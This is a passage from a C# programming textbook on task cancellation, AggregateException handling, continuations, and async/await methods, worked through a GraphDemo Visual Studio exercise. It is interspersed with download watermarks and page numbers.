In the next exercise, you will attempt to report the status of each task so
that you can see when they have completed or have been canceled.
Canceling a Parallel For or ForEach loop
The Parallel.For and Parallel.ForEach methods don’t provide you with
direct access to the Task objects that have been created. Indeed, you
don’t even know how many tasks are running—the .NET Framework
uses its own heuristics to work out the optimal number to use based on
the resources available and the current workload of the computer.
If you want to stop the Parallel.For or Parallel.ForEach method
early, you must use a Parallel-LoopState object. The method you
specify as the body of the loop must include an additional
ParallelLoopState parameter. The Parallel class creates a
ParallelLoopState object and passes it as this parameter into the
method. The Parallel class uses this object to hold information about
each method invocation. The method can call the Stop method of this
object to indicate that the Parallel class should not attempt to perform
any iterations beyond those that have already started and finished. The
example that follows shows the Parallel.For method calling the
Download from finelybook [email protected]
808
doLoopWork method for each iteration. The doLoopWork method
examines the iteration variable; if it is greater than 600, the method calls
the Stop method of the ParallelLoopState parameter. This causes the
Parallel.For method to stop running further iterations of the loop.
(Iterations currently running might continue to completion.)
Note Remember that the iterations in a Parallel.For loop are not
run in a specific sequence. Consequently, canceling the loop when
the iteration variable has the value 600 does not guarantee that the
previous 599 iterations have already run. Likewise, some
iterations with values greater than 600 might already have
completed.
Click here to view code image
Parallel.For(0, 1000, doLoopWork);
...
private void doLoopWork(int i, ParallelLoopState p)
{
...
if (i > 600)
{
p.Stop();
}
}
Display the status of each task
1. In Visual Studio, display the MainPage.xaml file in the Design View
window. In the XAML pane, add the following markup to the definition
of the MainPage form before the final </Grid> tag, as shown in the
following in bold:
Click here to view code image
<Image x:Name="graphImage" Grid.Column="1"
Stretch="Fill" />
</Grid>
Download from finelybook [email protected]
809
<TextBlock x:Name="messages" Grid.Row="4" FontSize="18"
HorizontalAlignment="Left"/>
</Grid>
</Page>
This markup adds a TextBlock control named messages to the bottom of
the form.
2. Display the MainPage.xaml.cs file in the Code and Text Editor window
and find the plotButton_Click method.
3. Add the code shown below in bold to this method. These statements
generate a string that contains the status of each task after it has finished
running and then display this string in the messages TextBlock control at
the bottom of the form.
Click here to view code image
private async void plotButton_Click(object sender,
RoutedEventArgs e)
{
...
await first;
await second;
duration.Text = $"Duration (ms):
{watch.ElapsedMilliseconds}";
string message = $"Status of tasks is {first.Status},
{second.Status}";
messages.Text = message;
...
}
4. On the Debug menu, click Start Without Debugging.
5. In the GraphDemo window, click Plot Graph but do not click Cancel.
Verify that the message displayed reports that the status of the tasks is
RanToCompletion (two times).
6. In the GraphDemo window, click Plot Graph again, and then quickly
click Cancel.
Surprisingly, the message that appears still reports the status of each task
as RanToCompletion, even though the graph appears with holes.
This behavior occurs because although you sent a cancellation request to
each task by using the cancellation token, the methods they were
Download from finelybook [email protected]
810
running simply returned. The .NET Framework runtime does not know
whether the tasks were actually canceled or whether they were allowed
to run to completion, and it simply ignored the cancellation requests.
7. Close the GraphDemo application and return to Visual Studio.
So, how do you indicate that a task has been canceled rather than allowed
to run to completion? The answer lies in the CancellationToken object passed
as a parameter to the method that the task is running. The CancellationToken
class provides a method called ThrowIfCancellationRequested. This method
tests the IsCancellationRequested property of a cancellation token; if it is
true, the method throws an OperationCanceledException exception and
aborts the method that the task is running.
The application that started the thread should be prepared to catch and
handle this exception, but this leads to another question. If a task terminates
by throwing an exception, it actually reverts to the Faulted state. This is true
Download from finelybook [email protected]
811
even if the exception is an OperationCanceledException exception. A task
enters the Canceled state only if it is canceled without throwing an exception.
So, how does a task throw an OperationCanceledException without it being
treated as an exception?
This time, the answer lies in the task itself. For a task to recognize that an
OperationCanceledException exception is the result of canceling the task in a
controlled manner and not just an exception caused by other circumstances, it
has to know that the operation has actually been canceled. It can do this only
if it can examine the cancellation token. You passed this token as a parameter
to the method run by the task, but the task does not actually check any of
these parameters. Instead, you specify the cancellation token when you create
and run the task. The code that follows shows an example based on the
GraphDemo application. Notice how the token parameter is passed to the
generateGraphData method (as before) but also as a separate parameter to
the Run method.
Click here to view code image
tokenSource = new CancellationTokenSource();
CancellationToken token = tokenSource.Token;
...
Task first = Task.Run(() => generateGraphData(data, 0, pixelWidth /
4, token), token);
Now, when the method being run by the task throws an
OperationCanceledException exception, the infrastructure behind the task
examines the CancellationToken. If it indicates that the task has been
canceled, the infrastructure sets the status of the task to Canceled. If you are
using the await operator to wait for the tasks to complete, you also need to be
prepared to catch and handle the OperationCanceledException exception.
This is what you will do in the next exercise.
Acknowledge cancellation, and handle the OperationCanceledException
exception
1. In Visual Studio, return to the Code and Text Editor window displaying
the MainPage.xaml.cs file. In the plotButton_Click method, modify the
statements that create and run the tasks and specify the
CancellationToken object as the second parameter to the Run method
(and also as a parameter to the generateGraphData method), as shown
in bold in the following code:
Download from finelybook [email protected]
812
Click here to view code image
private async void plotButton_Click(object sender,
RoutedEventArgs e)
{
...
tokenSource = new CancellationTokenSource();
CancellationToken token = tokenSource.Token;
...
Task first = Task.Run(() => generateGraphData(data, 0,
pixelWidth / 4, token), token);
Task second = Task.Run(() => generateGraphData(data,
pixelWidth / 4,
pixelWidth / 2, token), token);
...
}
2. Add a try block around the statements that create and run the tasks, wait
for them to complete, and display the elapsed time. Add a catch block
that handles the OperationCanceledException exception. In this
exception handler, display the reason for the exception reported in the
Message property of the exception object in the duration TextBlock
control. The following code shown in bold highlights the changes you
should make:
Click here to view code image
private async void plotButton_Click(object sender,
RoutedEventArgs e)
{
...
try
{
await first;
await second;
duration.Text = $"Duration (ms):
{watch.ElapsedMilliseconds}";
}
catch (OperationCanceledException oce)
{
duration.Text = oce.Message;
}
string message = $"Status of tasks is {first.Status,
{second.Status}";
...
}
3. In the generateGraphData method, comment out the if statement that
examines the IsCancellationRequested property of the
Download from finelybook [email protected]
813
CancellationToken object and add a statement that calls the
ThrowIfCancellationRequested method, as shown here in bold:
Click here to view code image
private void generateGraphData(byte[] data, int partitionStart,
int partitionEnd, CancellationToken token)
{
...
for (int x = partitionStart; x < partitionEnd; x++);
{
...
for (double i = -p; i < p; i += 3)
{
//if (token.IsCancellationRequested)
//{
// return;
//}
token.ThrowIfCancellationRequested();
...
}
}
...
}
4. On the Debug menu, click Start Without Debugging.
5. In the GraphDemo window, click Plot Graph, wait for the graph to
appear, and verify that the status of both tasks is reported as
RanToCompletion and the graph is generated.
6. Click Plot Graph again, and then quickly click Cancel.
If you are quick, the status of one or both tasks should be reported as
Canceled, the duration TextBox control should display the text “The
operation was canceled,” and the graph should be displayed with holes.
If you were not quick enough, repeat this step to try again.
Download from finelybook [email protected]
814
7. Close the GraphDemo application and return to Visual Studio.
Handling task exceptions by using the
AggregateException class
You have seen throughout this book that exception handling is an
important element in any commercial application. The exception
handling constructs you have met so far are straightforward to use, and
if you use them carefully, it is a simple matter to trap an exception and
determine which piece of code raised it. When you start dividing work
into multiple concurrent tasks, though, tracking and handling exceptions
becomes a more complex problem. The previous exercise showed how
you could catch the OperationCanceledException exception that is
thrown when you cancel a task. However, there are plenty of other
exceptions that might also occur, and different tasks might each
generate their own exceptions. Therefore, you need a way to catch and
handle multiple exceptions that might be thrown concurrently.
Download from finelybook [email protected]
815
If you are using one of the Task wait methods to wait for multiple
tasks to complete (using the instance Wait method or the static
Task.WaitAll and Task.WaitAny methods), any exceptions thrown by the
methods that these tasks are running are gathered together into a single
exception referred to as an AggregateException exception. An
AggregateException exception acts as a wrapper for a collection of
exceptions. Each of the exceptions in the collection might be thrown by
different tasks. In your application, you can catch the
AggregateException exception and then iterate through this collection
and perform any necessary processing. To help you, the
AggregateException class provides the Handle method. The Handle
method takes a Func<Exception, bool> delegate, which references a
method that takes an Exception object as its parameter and returns a
Boolean value. When you call Handle , the referenced method runs for
each exception in the collection in the AggregateException object. The
referenced method can examine the exception and take the appropriate
action. If the referenced method handles the exception, it should return
true . If not, it should return false . When the Handle method completes,
any unhandled exceptions are bundled together into a new
AggregateException exception, and this exception is thrown. A
subsequent outer exception handler can then catch this exception and
process it.
The code fragment that follows shows an example of a method that
can be registered with an AggregateException exception handler. This
method simply displays the message “Division by zero occurred” if it
detects a DivideByZeroException exception, or the message “Array
index out of bounds” if an IndexOutOfRangeException exception
occurs. Any other exceptions are left unhandled.
Click here to view code image
private bool handleException(Exception e)
{
if (e is DivideByZeroException)
{
displayErrorMessage("Division by zero occurred");
return true;
}
if (e is IndexOutOfRangeException)
{
displayErrorMessage("Array index out of bounds");
Download from finelybook [email protected]
816
return true;
}
return false;
When you use one of the Task wait methods, you can catch the
AggregateException exception and register the handleException
method, like this:
Click here to view code image
try
{
Task first = Task.Run(...);
Task second = Task.Run(...);
Task.WaitAll(first, second);
}
catch (AggregateException ae)
{
ae.Handle(handleException);
}
If any of the tasks generate a DivideByZeroException exception or
an IndexOutOfRangeException exception, the handleException method
will display an appropriate message and acknowledge the exception as
handled. Any other exceptions are classified as unhandled and will
propagate out from the AggregateException exception handler in the
customary manner.
There is one additional complication of which you should be aware.
When you cancel a task, you have seen that the CLR throws an
OperationCanceledException exception, and this is the exception that is
reported if you are using the await operator to wait for the task.
However, if you are using one of the Task wait methods, this exception
is transformed into a TaskCanceledException exception, and this is the
type of exception that you should be prepared to handle in the
AggregateException exception handler.
Using continuations with canceled and faulted tasks
If you need to perform additional work when a task is canceled or raises an
unhandled exception, remember that you can use the ContinueWith method
with the appropriate TaskContinuationOptions value. For example, the
Download from finelybook [email protected]
817
following code creates a task that runs the method doWork. If the task is
canceled, the ContinueWith method specifies that another task should be
created and run the method doCancellationWork. This method can perform
some simple logging or tidying up. If the task is not canceled, the
continuation does not run.
Click here to view code image
Task task = new Task(doWork);
task.ContinueWith(doCancellationWork,
TaskContinuationOptions.OnlyOnCanceled);
task.Start();
...
private void doWork()
{
// The task runs this code when it is started
...
}
...
private void doCancellationWork(Task task)
{
// The task runs this code when doWork completes
...
}
Similarly, you can specify the value
TaskContinuationOptions.OnlyOnFaulted to specify a continuation that runs
if the original method run by the task raises an unhandled exception.
Summary
In this chapter, you learned why it is important to write applications that can
scale across multiple processors and processor cores. You saw how to use the
Task class to run operations in parallel and how to synchronize concurrent
operations and wait for them to complete. You learned how to use the
Parallel class to parallelize some common programming constructs, and you
also saw when it is inappropriate to parallelize code. You used tasks and
threads together in a graphical user interface to improve responsiveness and
throughput, and you saw how to cancel tasks in a clean and controlled
manner.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 24.
Download from finelybook [email protected]
818
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Create a
task and run
it
Use the static Run method of the Task class to create and run
the task in a single step:
Click here to view code image
Task task = Task.Run(() => doWork());
...
private void doWork()
{
// The task runs this code when it is started
...
}
Or, create a new Task object that references a method to run
and call the Start method:
Task task = new Task(doWork);
task.Start();
Wait for a
task to
finish
Call the Wait method of the Task object:
Task task = ...;
...
task.Wait();
Or, use the await operator (only in an async method):
await task;
Wait for
several
tasks to
finish
Call the static WaitAll method of the Task class, and specify
the tasks to wait for:
Click here to view code image
Task task1 = ...;
Task task2 = ...;
Task task3 = ...;
Task task4 = ...;
...
Task.WaitAll(task1, task2, task3, task4);
Download from finelybook [email protected]
819
Specify a
method to
run in a
new task
when a task
has
completed
Call the ContinueWith method of the task and specify the
method as a continuation:
Click here to view code image
Task task = new Task(doWork);
task.ContinueWith(doMoreWork,
TaskContinuationOptions.NotOnFaulted);
Perform
loop
iterations
and
statement
sequences
by using
parallel
tasks
Use the Parallel.For and Parallel.ForEach methods to
perform loop iterations by using tasks:
Click here to view code image
Parallel.For(0, 100, performLoopProcessing);
...
private void performLoopProcessing(int x)
{
// Perform loop processing
}
Use the Parallel.Invoke method to perform concurrent method
calls by using separate tasks:
Click here to view code image
Parallel.Invoke(
doWork,
doMoreWork,
doYetMoreWork
);
Handle
exceptions
raised by
one or more
tasks
Catch the AggregateException exception. Use the Handle
method to specify a method that can handle each exception in
the AggregateException object. If the exception-handling
method handles the exception, return true; otherwise, return
false:
Click here to view code image
try
{
Task task = Task.Run(...);
task.Wait();
...
}
catch (AggregateException ae)
{
ae.Handle(handleException);
Download from finelybook [email protected]
820
}
...
private bool handleException(Exception e)
{
if (e is TaskCanceledException)
{
...
return true;
}
else
{
return false;
}
}
Enable
cancellation
in a task
Implement cooperative cancellation by creating a
CancellationTokenSource object and using a
CancellationToken parameter in the method run by the task. In
the task method, call the ThrowIfCancellationRequested
method of the CancellationToken parameter to throw an
OperationCanceledException exception and terminate the
task:
Click here to view code image
private void generateGraphData(..., CancellationToken
token)
{
...
token.ThrowIfCancellationRequested();
...
}
Download from finelybook [email protected]
821
CHAPTER 24
Improving response time by
performing asynchronous
operations
After completing this chapter, you will be able to:
Define and use asynchronous methods to improve the interactive
response time of applications that perform long-running and I/O-bound
operations.
Explain how to reduce the time taken to perform complex LINQ
queries by using parallelization.
Use the concurrent collection classes to share data between parallel
tasks safely.
Chapter 23, “Improving throughput by using tasks,” demonstrates how to
use the Task class to perform operations in parallel and improve throughput
in compute-bound applications. However, while maximizing the processing
power available to an application can make it run more quickly,
responsiveness is also important. Remember that the Windows user interface
operates by using a single thread of execution, but users expect an application
to respond when they click a button on a form, even if the application is
currently performing a large and complex calculation. Additionally, some
tasks might take a considerable time to run even if they are not compute-
bound (an I/O-bound task waiting to receive information across the network
Download from finelybook [email protected]
822
from a remote website, for example), and blocking user interaction while
waiting for an event that might take an indeterminate time to happen is
clearly not good design practice. The solution to both of these problems is the
same: perform the task asynchronously and leave the user interface thread
free to handle user interactions.
Issues with response time are not limited to user interfaces. For example,
Chapter 21, “Querying in-memory data by using query expressions,” shows
how you can access data held in memory in a declarative manner by using
Language-Integrated Query (LINQ). A typical LINQ query generates an
enumerable result set, and you can iterate serially through this set to retrieve
the data. If the data source used to generate the result set is large, running a
LINQ query can take a long time. Many database management systems faced
with the issue of optimizing queries address this issue by using algorithms
that break down the process of identifying the data for a query into a series of
tasks, and they then run these tasks in parallel, combining the results when
the tasks have completed to generate the complete result set. The designers of
the Microsoft .NET Framework decided to provide LINQ with a similar
facility, and the result is Parallel LINQ or PLINQ. You will study PLINQ in
the second part of this chapter.
Asynchronicity and scalability
Asynchronicity is a powerful concept that you need to understand if you
are building large-scale solutions such as enterprise web applications
and services. A web server typically has limited resources with which to
handle requests from a potentially very large audience, each member of
which expects his or her requests to be handled quickly. In many cases,
a user request can invoke a series of operations that individually can
take significant time (perhaps as much as a second or two). Consider an
e-commerce system in which a user is querying the product catalog or
placing an order, for example. Both of these operations typically
involve reading and writing data held in a database that might be
managed by a database server remote from the web server. Many web
servers can support only a limited number of concurrent connections,
and if the thread associated with a connection is waiting for an I/O
operation to complete, that connection is effectively blocked. If the
Download from finelybook [email protected]
823
thread creates a separate task to handle the I/O asynchronously, then the
thread can be released and the connection recycled for another user.
This approach is far more scalable than implementing such operations
synchronously.
For an example and a detailed explanation of why performing
synchronous I/O is bad in this situation, read about the Synchronous I/O
anti-pattern in the public Microsoft Patterns & Practices Git repository,
at https://github.com/mspnp/performance-
optimization/tree/master/SynchronousIO.
Implementing asynchronous methods
An asynchronous method is one that does not block the current thread on
which it starts to run. When an application invokes an asynchronous method,
an implied contract expects the method to return control to the calling
environment quite quickly and to perform its work on a separate thread. The
definition of quite is not a mathematically defined quantity, but the
expectation is that if an asynchronous method performs an operation that
might cause a noticeable delay to the caller, it should do so by using a
background thread, enabling the caller to continue running on the current
thread. This process sounds complicated, and indeed in earlier versions of the
.NET Framework, it was. However, C# now provides the async method
modifier and the await operator, which abstract much of this complexity to
the compiler, meaning that (most of the time) you no longer have to concern
yourself with the intricacies of multithreading.
Defining asynchronous methods: The problem
You have already seen how you can implement concurrent operations by
using Task objects. To quickly recap, when you initiate a task by using the
Start or Run method of the Task type, the common language runtime (CLR)
uses its own scheduling algorithm to allocate the task to a thread and set this
thread running at a time convenient to the operating system when sufficient
resources are available.
Download from finelybook [email protected]
824
This approach frees your code from the requirement to recognize and
manage the workload of your computer. If you need to perform another
operation when a specific task completes, you have the following choices:
You can manually wait for the task to finish by using one of the Wait
methods exposed by the Task type. You can then initiate the new
operation, possibly by defining another task.
You can define a continuation. A continuation simply specifies an
operation to be performed when a given task completes. The .NET
Framework automatically executes the continuation operation as a task
that it schedules when the original task finishes. The continuation
reuses the same thread as the original task.
However, even though the Task type provides a convenient generalization
of an operation, you still often have to write potentially awkward code to
solve some of the common problems that developers encounter when using a
background thread. For example, suppose that you define the following
method, which performs a series of long-running operations that must run in
a serial manner and then displays a message in a TextBox control on the
screen:
Click here to view code image
private void slowMethod()
{
doFirstLongRunningOperation();
doSecondLongRunningOperation();
doThirdLongRunningOperation();
message.Text = "Processing Completed";
}
private void doFirstLongRunningOperation()
{
...
}
private void doSecondLongRunningOperation()
{
...
}
private void doThirdLongRunningOperation()
{
...
}
Download from finelybook [email protected]
825
If you invoke slowMethod from a piece of user interface code (such as the
Click event handler for a button control), the user interface will become
unresponsive until this method completes. You can make the slowMethod
method more responsive by using a Task object to run the
doFirstLongRunningOperation method and define continuations for the same
Task that run the doSecondLongRunningOperation and
doThirdLongRunningOperation methods in turn, like this:
Click here to view code image
private void slowMethod()
{
Task task = new Task(doFirstLongRunningOperation);
task.ContinueWith(doSecondLongRunningOperation);
task.ContinueWith(doThirdLongRunningOperation);
task.Start();
message.Text = "Processing Completed"; // When does this message
appear?
}
private void doFirstLongRunningOperation()
{
...
}
private void doSecondLongRunningOperation(Task t)
{
...
}
private void doThirdLongRunningOperation(Task t)
{
...
}
Although this refactoring seems fairly simple, there are points that you
should note. Specifically, the signatures of the
doSecondLongRunningOperation and doThirdLongRunningOperation
methods have changed to accommodate the requirements of continuations
(the Task object that instigated the continuation is passed as a parameter to a
continuation method). More important, you need to ask yourself, “When is
the message displayed in the TextBox control?” The issue with this second
point is that although the Start method initiates a Task, it does not wait for it
to complete, so the message appears while the processing is being performed
rather than when it has finished.
Download from finelybook [email protected]
826
This is a somewhat trivial example, but the general principle is important,
and there are at least two solutions. The first is to wait for the Task to
complete before displaying the message, like this:
Click here to view code image
private void slowMethod()
{
Task task = new Task(doFirstLongRunningOperation);
task.ContinueWith(doSecondLongRunningOperation);
task.ContinueWith(doThirdLongRunningOperation);
task.Start();
task.Wait();
message.Text = "Processing Completed";
}
However, the call to the Wait method now blocks the thread executing the
slowMethod method and obviates the purpose of using a Task in the first
place.
Important Generally speaking, you should never call the Wait method
directly in the user interface thread.
A better solution is to define a continuation that displays the message and
arrange for it to run only when the doThirdLongRunningOperation method
finishes, in which case you can remove the call to the Wait method. You
might be tempted to implement this continuation as a delegate as shown in
bold in the following code (remember that a continuation is passed a Task
object as an argument; that is the purpose of the t parameter to the delegate):
Click here to view code image
private void slowMethod()
{
Task task = new Task(doFirstLongRunningOperation);
task.ContinueWith(doSecondLongRunningOperation);
task.ContinueWith(doThirdLongRunningOperation);
task.ContinueWith((t) => message.Text = "Processing Complete");
task.Start();
}
Download from finelybook [email protected]
827
Unfortunately, this approach exposes another problem. If you try to run
this code in debug mode, you will find that the final continuation generates a
System.Exception exception with the rather obscure message, “The
application called an interface that was marshaled for a different thread.” The
issue here is that only the user interface thread can manipulate user interface
controls, and now you are attempting to write to a TextBox control from a
different thread—the thread being used to run the Task. You can resolve this
problem by using the Dispatcher object. The Dispatcher object is a
component of the user interface infrastructure, and you can send it requests to
perform work on the user interface thread by calling its RunAsync method.
This method takes an Action delegate that specifies the code to run. The
details of the Dispatcher object and the RunAsync method are beyond the
scope of this book, but the following example shows how you might use
them to display the message required by the slowMethod method from a
continuation:
Click here to view code image
private void slowMethod()
{
Task task = new Task(doFirstLongRunningOperation);
task.ContinueWith(doSecondLongRunningOperation);
task.ContinueWith(doThirdLongRunningOperation);
task.ContinueWith((t) => this.Dispatcher.RunAsync(
CoreDispatcherPriority.Normal,
() => message.Text = "Processing Complete"));
task.Start();
}
This works, but it is messy and difficult to maintain. You now have a
delegate (the continuation) specifying another delegate (the code to be run by
RunAsync).
More info You can find more information about the Dispatcher object
and the RunAsync method on the Microsoft website at
https://msdn.microsoft.com/library/windows.ui.core.coredispatcher.runasync
Download from finelybook [email protected]
828
Defining asynchronous methods: The solution
The purpose of the async and await keywords in C# is to enable you to define
and call methods that can run asynchronously. This means that you don’t
have to concern yourself with specifying continuations or scheduling code to
run on Dispatcher objects to ensure that data is manipulated on the correct
thread. Very simply:
The async modifier indicates that a method contains functionality that
can be run asynchronously.
The await operator specifies the points at which this asynchronous
functionality should be performed.
The following code example shows the slowMethod method implemented
as an asynchronous method with the async modifier and await operators:
Click here to view code image
private async void slowMethod()
{
await doFirstLongRunningOperation();
await doSecondLongRunningOperation();
await doThirdLongRunningOperation();
message.Text = "Processing Complete";
}
This method now looks remarkably similar to the original version, and
that is the power of async and await. In fact, this magic is nothing more than
an exercise in reworking your code by the C# compiler. When the C#
compiler encounters the await operator in an async method, it effectively
reformats the operand that follows this operator as a task that runs on the
same thread as the async method. The remainder of the code is converted into
a continuation that runs when the task completes, again running on the same
thread. Now, because the thread that was running the async method was the
thread running the user interface, it has direct access to the controls in the
window, which means it can update them directly without routing them
through the Dispatcher object.
Although this approach looks quite simple at first glance, be sure to keep
in mind the following points and avoid some possible misconceptions:
The async modifier does not signify that a method runs asynchronously
on a separate thread. All it does is specify that the code in the method
Download from finelybook [email protected]
829
can be divided into one or more continuations. When these
continuations run, they execute on the same thread as the original
method call.
The await operator specifies a point at which the C# compiler can split
the code into a continuation. The await operator itself expects its
operand to be an awaitable object. An awaitable object is a type that
provides the GetAwaiter method, which returns an object that in turn
provides methods for running code and waiting for it to complete. The
C# compiler converts your code into statements that use these methods
to create an appropriate continuation.
Important You can use the await operator only in a method marked
with async. Outside an async method, the await keyword is treated as an
ordinary identifier (you can even create a variable called await,
although this is not recommended).
Asynchronous operations and the Main method
C# 7.0 and earlier does not permit you to mark the Main method as
async; if you try, you will receive the compiler error “Program does not
contain a static ‘Main’ method suitable for an entry point”. This means
that you cannot use the await operator directly from Main; instead, you
must wrap the await call inside an async method that you invoke from
Main, as follows:
Click here to view code image
public static void Main(string[] args)
{
DoAsyncWork(...).Wait();
}
static async Task DoAsyncWork(...)
{
await ...
}
Download from finelybook [email protected]
830
An annoying quirk of this approach is that Visual Studio highlights
the call to DoAsyncWork in the Main method with the warning
“Because this call is not awaited, execution of the current method
continues before the call is completed, Consider applying the ‘await’
operator to the result of the call.” If you follow this advice, you will
generate an error with the message “The ‘await’ operator can only be
used within an async method.”
C# 7.1 (currently in preview) relaxes the restriction and enables you
to mark the Main method as async. You can then use the await operator
directly within the Main method:
Click here to view code image
public static async Task Main(string[] args)
{
await DoAsyncWork(...);
}
To use C# 7.1 preview features with Visual Studio, perform the
following steps:
1. In the Solution Explorer window, right-click your project, and then
click Properties
2. In the Properties window, click the Build tab.
3. On the Build page, click Advanced.
4. In the Advanced Build Settings window, in the Language version
drop-down list box, click C# 7.1
5. Save the project.
In the current implementation of the await operator, the awaitable object it
expects you to specify as the operand is a Task. This means that you must
make some modifications to the doFirstLongRunningOperation,
doSecondLongRunningOperation, and doThirdLongRunningOperation
methods. Specifically, each method must now create and run a Task to
perform its work and return a reference to this Task. The following example
shows an amended version of the doFirstLongRunningOperation method:
Download from finelybook [email protected]
831
Click here to view code image
private Task doFirstLongRunningOperation()
{
Task t = Task.Run(() => { /* original code for this method goes
here */ });
return t;
}
It is also worth considering whether there are opportunities to break the
work done by the doFirstLongRunningOperation method into a series of
parallel operations. If so, you can divide the work into a set of Tasks, as
described in Chapter 23. However, which of these Task objects should you
return as the result of the method?
Click here to view code image
private Task doFirstLongRunningOperation()
{
Task first = Task.Run(() => { /* code for first operation */ });
Task second = Task.Run(() => { /* code for second operation */
});
return ...; // Do you return first or second?
}
If the method returns first, the await operator in the slowMethod will wait
only for that Task to complete and not for second. Similar logic applies if the
method returns second. The solution is to define the
doFirstLongRunningOperation method with async and await each of the
Tasks, as shown here:
Click here to view code image
private async Task doFirstLongRunningOperation()
{
Task first = Task.Run(() => { /* code for first operation */ });
Task second = Task.Run(() => { /* code for second operation */
});
await first;
await second;
}
Remember that when the compiler encounters the await operator, it
generates code that waits for the item specified by the argument to complete,
together with a continuation that runs the statements that follow. You can
think of the value returned by the async method as a reference to the Task
that runs this continuation (this description is not completely accurate, but it
Download from finelybook [email protected]
832
is a good enough model for the purposes of this chapter). So, the
doFirstLongRunningOperation method creates and starts the tasks first and
second running in parallel, the compiler reformats the await statements into
code that waits for first to complete followed by a continuation that waits for
second to finish, and the async modifier causes the compiler to return a
reference to this continuation. Notice that because the compiler now
determines the return value of the method, you no longer specify a return
value yourself (in fact, if you try to return a value, in this case, your code will
not compile).
Note If you don’t include an await statement in an async method, the
method is simply a reference to a Task that performs the code in the
body of the method. As a result, when you invoke the method, it does
not actually run asynchronously. In this case, the compiler will warn
you with the message, “This async method lacks await operators and
will run synchronously.”
Tip You can use the async modifier to prefix a delegate, making it
possible to create delegates that incorporate asynchronous processing by
using the await operator.
In the following exercise, you will work with the GraphDemo application
from Chapter 23 and modify it to generate the data for the graph by using an
asynchronous method.
Modify the GraphDemo application to use an asynchronous method
1. Using Microsoft Visual Studio 2017, open the GraphDemo solution,
which is located in the \Microsoft Press\VCSBS\Chapter
24\GraphDemo folder in your Documents folder.
Download from finelybook [email protected]
833
2. In Solution Explorer, expand the MainPage.xaml node and open the
MainPage.xaml.cs file in the Code and Text Editor window.
3. In the MainPage class, locate the plotButton_Click method.
The code in this method looks like this:
Click here to view code image
private void plotButton_Click(object sender, RoutedEventArgs e)
{
try
{
Random rand = new Random();
redValue = (byte)rand.Next(0xFF);
greenValue = (byte)rand.Next(0xFF);
blueValue = (byte)rand.Next(0xFF);
tokenSource = new CancellationTokenSource();
CancellationToken token = tokenSource.Token;
int dataSize = bytesPerPixel * pixelWidth * pixelHeight;
byte[] data = new byte[dataSize];
Stopwatch watch = Stopwatch.StartNew();
try
{
generateGraphData(data, 0, pixelWidth / 2, token);
duration.Text = $"Duration (ms):
{watch.ElapsedMilliseconds}";
}
catch (OperationCanceledException oce)
{
duration.Text = oce.Message;
}
duration.Text = $"Duration (ms):
{watch.ElapsedMilliseconds}";
WriteableBitmap graphBitmap = new
WriteableBitmap(pixelWidth, pixelHeight);
using (Stream pixelStream =
graphBitmap.PixelBuffer.AsStream())
{
pixelStream.Seek(0, SeekOrigin.Begin);
pixelStream.Write(data, 0, data.Length);
graphBitmap.Invalidate();
graphImage.Source = graphBitmap;
}
}
Download from finelybook [email protected]
834
catch (Exception ex)
{
MessageDialog msg = new MessageDialog("Exception",
ex.Message);
msg.ShowAsync();
}
}
This is a simplified version of the application from the previous chapter.
It invokes the generateGraphData method directly from the user
interface thread and does not use Task objects to generate the data for
the graph in parallel.
Note If you reduced the size of the pixelWidth and pixelHeight
fields in the exercises in Chapter 23 to save memory, do so again
in this version before proceeding with the next step.
4. On the Debug menu, click Start Without Debugging.
5. In the GraphDemo window, click Plot Graph. While the data is being
generated, try to click Cancel.
Notice that the user interface is completely unresponsive as the graph is
being generated and displayed. This is because the plotButton_Click
method performs all its work synchronously, including the generation of
the data for the graph.
6. Close the GraphDemo application and return to Visual Studio.
7. In the Code and Text Editor window displaying the MainPage class,
above the generateGraphData method, add a new private method called
generateGraphDataAsync.
This method should take the same list of parameters as the
generateGraphData method, but it should return a Task object rather
than a void. The method should also be marked with async, and it should
look like this:
Download from finelybook [email protected]
835
Click here to view code image
private async Task generateGraphDataAsync(byte[] data,
int partitionStart, int partitionEnd,
CancellationToken token)
{
}
Note It is recommended practice to name asynchronous methods
with the Async suffix.
8. In the generateGraphDataAsync method, add the statements shown here
in bold.
Click here to view code image
private async Task generateGraphDataAsync(byte[] data, int
partitionStart, int partitionEnd, CancellationToken token)
{
Task task = Task.Run(() =>
generateGraphData(data, partitionStart,
partitionEnd, token));
await task;
}
This code creates a Task object that runs the generateGraphData
method and uses the await operator to wait for the Task to complete.
The task generated by the compiler as a result of the await operator is
the value returned from the method.
9. Return to the plotButton_Click method and change the definition of this
method to include the async modifier, as shown in bold in the following
code:
Click here to view code image
private async void plotButton_Click(object sender,
RoutedEventArgs e)
{
...
}
Download from finelybook [email protected]
836
10. In the inner try block in the plotButton_Click method, modify the
statement that generates the data for the graph to call the
generateGraphDataAsync method asynchronously, as shown here in
bold:
Click here to view code image
try
{
await generateGraphDataAsync(data, 0, pixelWidth / 2,
token);
duration.Text = $"Duration (ms):
{watch.ElapsedMilliseconds}");
}
...
11. On the Debug menu, click Start Without Debugging.
12. In the GraphDemo window, click Plot Graph and verify that the
application generates the graph correctly.
13. Click Plot Graph, and then, while the data is being generated, click
Cancel.
This time, the user interface should be responsive. Only part of the
graph should be generated.
Download from finelybook [email protected]
837
14. Close the GraphDemo application and return to Visual Studio.
Defining asynchronous methods that return values
So far, all the examples you have seen use a Task object to perform a piece of
work that does not return a value. However, you also use tasks to run
methods that calculate a result. To do this, you use the generic
Task<TResult> class, where the type parameter, TResult, specifies the type of
the result.
You create and start a Task<TResult> object in a similar way as for an
ordinary Task. The primary difference is that the code you execute should
return a value. For example, the method named calculateValue shown in the
code example that follows generates an integer result. To invoke this method
by using a task, you create and run a Task<int> object. You obtain the value
returned by the method by querying the Result property of the Task<int>
object. If the task has not finished running the method and the result is not yet
Download from finelybook [email protected]
838
available, the Result property blocks the caller. This means that you don’t
have to perform any synchronization yourself, and you know that when the
Result property returns a value, the task has completed its work.
Click here to view code image
Task<int> calculateValueTask = Task.Run(() => calculateValue(...));
...
int calculatedData = calculateValueTask.Result; // Block until
calculateValueTask completes
...
private int calculateValue(...)
{
int someValue;
// Perform calculation and populate someValue
...
return someValue;
}
The generic Task<TResult> type is also the basis of the mechanism for
defining asynchronous methods that return values. In previous examples, you
saw that you implement asynchronous void methods by returning a Task. If
an asynchronous method actually generates a result, it should return a
Task<TResult>, as shown in the following example, which creates an
asynchronous version of the calculateValue method:
Click here to view code image
